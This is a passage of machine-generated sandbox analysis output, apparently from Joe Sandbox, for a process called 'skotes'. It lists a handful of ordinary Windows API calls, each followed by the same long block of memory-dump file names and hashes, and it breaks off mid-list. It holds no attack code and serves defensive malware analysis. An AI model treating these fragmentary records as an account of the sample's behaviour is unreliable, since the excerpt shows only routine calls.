                                                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00AC8524
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoNativeSystem
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1721193555-0
                                                                                                                                            • Opcode ID: e93c627be3a522d6435cada9c1373969be0275ade7e4c5a0faa7998a907d66fb
                                                                                                                                            • Instruction ID: ed129489b4c4e27347680e80e4cbe3d1b954c164d833d14cce546ac7d38850a1
                                                                                                                                            • Opcode Fuzzy Hash: e93c627be3a522d6435cada9c1373969be0275ade7e4c5a0faa7998a907d66fb
                                                                                                                                            • Instruction Fuzzy Hash: 19513870D142189BDB18EB68CE49BDEB774EF45710F50429DE409A73C1EF799E808B91
                                                                                                                                            APIs
                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,00AF705B,?,?,00000000,00000000), ref: 00AF7166
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Time$LocalSpecificSystem
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2574697306-0
                                                                                                                                            • Opcode ID: 74cb76337183fbb08d6f41a0ce1614ebe270aa050d1464682563a7182ca7e2c0
                                                                                                                                            • Instruction ID: 89f60e737320d4097cf44da749b28d15ce11dfd6d5b003323f3ce567bf2c26fe
                                                                                                                                            • Opcode Fuzzy Hash: 74cb76337183fbb08d6f41a0ce1614ebe270aa050d1464682563a7182ca7e2c0
                                                                                                                                            • Instruction Fuzzy Hash: 2211D67290410DAADB10DFD5C985EEFB7BCAF08310F605266F616E2190EA30EA49CB65
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __wsopen_s
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3347428461-0
                                                                                                                                            • Opcode ID: bddeac3087d0dd3b04cdfce9afb395d28509e9cc01da36f349e279729259db42
                                                                                                                                            • Instruction ID: 5db423a8490f4d8eda7343df95397043fbcf1dea6c195ab2153cd29a48e384a7
                                                                                                                                            • Opcode Fuzzy Hash: bddeac3087d0dd3b04cdfce9afb395d28509e9cc01da36f349e279729259db42
                                                                                                                                            • Instruction Fuzzy Hash: D81115B5A0420AAFCB05DF98E9419DA7BF4EF48314F0440A9F819AB251DA30EE25CB65
                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,E6CEA310,?,?,00ADD3FC,E6CEA310,?,00AD7A8B,?,?,?,?,?,?,00AC7465,?), ref: 00AFB07E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                            • Opcode ID: 6ab40ef2e3d46314cdb08fb001c18669418dc4aaaf12f425133a3a9914de3971
                                                                                                                                            • Instruction ID: abbe7945864d1b8d4ceb53364a23a7eb7ded014d25e59c1125429a11b8883823
                                                                                                                                            • Opcode Fuzzy Hash: 6ab40ef2e3d46314cdb08fb001c18669418dc4aaaf12f425133a3a9914de3971
                                                                                                                                            • Instruction Fuzzy Hash: 0BE06D3516122E96EA3133E5CD41BBFA6699B423E2F251220BF6496590EF20DC0081F0
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNEL32(00000000,00000000,?,00B01B65,?,?,00000000,?,00B01B65,00000000,0000000C), ref: 00B01792
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
